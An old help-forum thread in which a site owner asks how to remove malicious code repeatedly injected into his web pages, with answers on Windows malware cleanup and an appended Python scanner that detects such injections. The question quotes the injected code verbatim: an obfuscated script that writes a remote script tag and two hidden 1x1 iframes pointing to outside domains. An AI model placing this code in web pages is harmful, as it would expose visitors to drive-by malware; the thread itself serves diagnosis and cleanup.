Virus Attack on my site from javascript and Iframe code

Posted on 2009-04-26
Last Modified: 2013-12-04
Hi,

My site was hacked and the hacker put some malicious code on my web pages.
They put some JavaScript code above the body tag and also put an iframe at the bottom of the web pages.
I removed this code but it keeps coming back again and again.
Please let me know where it came from and how I can remove it from my site.

Secondly, I am sure there is some problem with my local machine. I am using Windows 2003 Server.
Could you please let me know of some antivirus or virus removal tools, so that I can trace this virus on my local machine?

How can I remove this virus completely from my machine?

Thank you



 


 

<script language=javascript><!-- 
document.write(unescape('%3CscFurFuirjprjt6yl%20UOsFurDGc%3D6yl%2F%2F9rj46yl%2E247%2E9YL26yl%2E1DG9rj59YL%2FbtjFuqFuueDGr6yly%2E9YLjrjsbt%3E6yl%3C%2Fs6ylcrjrrjipt%3E').replace(/6yl|DG|rj|9YL|bt|Fu|UO/g,""));
 --></script>
 
<iframe src="http://vafuiek.com/?click=674958" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://internetcountercheck.com/?click=19908031" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

Question by:Gurbirs
3 Comments
 
Accepted Solution

by: rpggamergirl (earned 1000 total points)
ID: 24239107
Is your site hosted by IX Web Hosting?

On your local machine, look for any of these FAKE files (search engine hijackers) and delete them if present in the system32 folder.
C:\Windows\system32\wdmaud.sys <-- bad
C:\Windows\system32\sysaudio.sys <-- bad
c:\windows\system32\ntnet.drv <-- bad


If the above files are not found in the system, also check the registry key below and check the values of "aux, aux1, aux2, aux3, aux4" to make sure there are no values pointing to random filenames (similar to the ones below).
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"aux"="C:\\WINDOWS\\system32\\..\\jjmviih.nkt"
"aux"="C:\WINDOWS\system32\..\sjkemx.iqd"
"aux2"="C:\WINDOWS\system32\..\kvlhurx.niq"
"aux2"="C:\Windows\system32\..\wkliog.nyc"
"aux4"="c:\docume~1\%username%\LOCALS~1\Temp\..\herlppj.sna"



Also run Malwarebytes and ComboFix (re-download, but rename the tools before saving, if they don't run at first):
1.  Download Malwarebytes' Anti-Malware to your desktop, and check for the tool's updates before running a scan.
http://www.malwarebytes.org/mbam.php


2.  Please download ComboFix by sUBs and show us the log file (it doesn't support 2003 but it will run):
http://download.bleepingcomputer.com/sUBs/ComboFix.exe

You must download it to and run it from your Desktop.
Now STOP all your monitoring programs (Antivirus/Antispyware, Guards and Shields) as they could easily interfere with ComboFix.
Double-click combofix.exe and follow the prompts.
When finished, it will produce a log. Please save that log and attach it in your next reply by pasting it in the "Code Snippet" or "Attach File" window.
Re-enable all the programs that were disabled during the running of ComboFix.

Note:
Do not mouse-click combofix's window while it is running. That may cause it to stall.
CF disconnects your machine from the internet. The connection is automatically restored before CF completes its run. If CF runs into difficulty and terminates prematurely, the connection can be manually restored by restarting your machine.


If needed, here's the Combofix tutorial which includes the installation of the Recovery Console:
http://www.bleepingcomputer.com/combofix/how-to-use-combofix

0
 

Author Comment

by:Gurbirs
ID: 24239722
Is there any auto scanner software with which I can scan for this particular virus?



0
 
Assisted Solution

by: pand0ra_usa (earned 1000 total points)
ID: 24283996
Do a Google search for "web virus scanner" and choose one that you like. FYI this looks like an XSS attack. Make sure you validate ALL input and output from your web page (consider all input as hostile). OWASP guides can help you with this if it is new to you.
0
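Added example, not part of any post in this thread: a static check that flags the two injection patterns shown in the question (the document.write(unescape(...).replace(...)) wrapper and the hidden 1x1 iframe) and decodes the wrapper without executing it. The sample markup, the example.invalid hosts and the function names are constructed for illustration; it assumes the junk pattern is a plain alternation of literal tokens, as in the question.

```python
import re
from urllib.parse import unquote

# Wrapper seen in the question: document.write(unescape('<payload>').replace(/<junk>/g,""))
OBFUSCATED = re.compile(
    r"""document\.write\(\s*unescape\(\s*(["'])(?P<payload>.*?)\1\s*\)"""
    r"""\s*\.replace\(\s*/(?P<junk>[^/]+)/g\s*,\s*(["'])\4\s*\)""", re.S)
IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
# 0/1-pixel dimensions or CSS hiding, as on the iframes in the question
HIDDEN = re.compile(
    r"""(?:width|height)\s*=\s*["']?[01]\b|visibility\s*:\s*hidden|display\s*:\s*none""",
    re.I)
SRC = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)

def decode_obfuscated(html):
    """Return the markup each wrapper would write, computed statically (never run)."""
    decoded = []
    for m in OBFUSCATED.finditer(html):
        # Treat the junk pattern as literal tokens separated by '|'
        junk = "|".join(re.escape(tok) for tok in m.group("junk").split("|"))
        decoded.append(re.sub(junk, "", unquote(m.group("payload"))))
    return decoded

def hidden_iframes(html):
    """Return the src of every iframe that is sized or styled to be invisible."""
    found = []
    for tag in IFRAME.findall(html):
        src = SRC.search(tag)
        if src and HIDDEN.search(tag):
            found.append(src.group(1))
    return found

def scan(html):
    return {"decoded_scripts": decode_obfuscated(html),
            "hidden_iframes": hidden_iframes(html)}

# Constructed sample in the same style as the injected code; hosts are placeholders.
SAMPLE = """<script language=javascript><!--
document.write(unescape('%3CscQzript%20s7Krc%3D%2F%2Fcdn%2EexQzample%2Einvalid%2Fx%2E7Kjs%3E%3C%2FscrQzipt%3E').replace(/Qz|7K/g,""));
 --></script>
<iframe src="http://tracker.example.invalid/?click=1" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
<iframe src="/help.html" width=600 height=400></iframe>
"""

if __name__ == "__main__":
    for kind, hits in scan(SAMPLE).items():
        print(kind, hits)
```

Run `scan()` over each file under the web root; pages that keep coming back with hits after cleanup are being rewritten by something that still has write access to the site.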